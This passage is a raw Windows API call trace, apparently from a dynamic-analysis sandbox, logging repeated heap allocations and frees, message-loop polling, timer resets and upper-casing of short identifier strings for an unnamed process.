hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0265.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.851] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0265.852] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.852] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0265.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0265.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0265.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0265.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.854] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0265.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.854] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0265.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0265.854] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.855] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0265.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.855] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 1 [0265.856] TranslateMessage (lpMsg=0x8bf250) returned 0 [0265.856] DispatchMessageW (lpMsg=0x8bf250) returned 0x0 [0265.856] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0265.856] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0265.856] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0265.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.857] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0265.857] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.857] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.857] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0265.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0265.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.857] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.858] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0265.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0265.858] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.858] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.859] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.860] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0265.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0265.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0265.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0265.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0265.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0265.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: 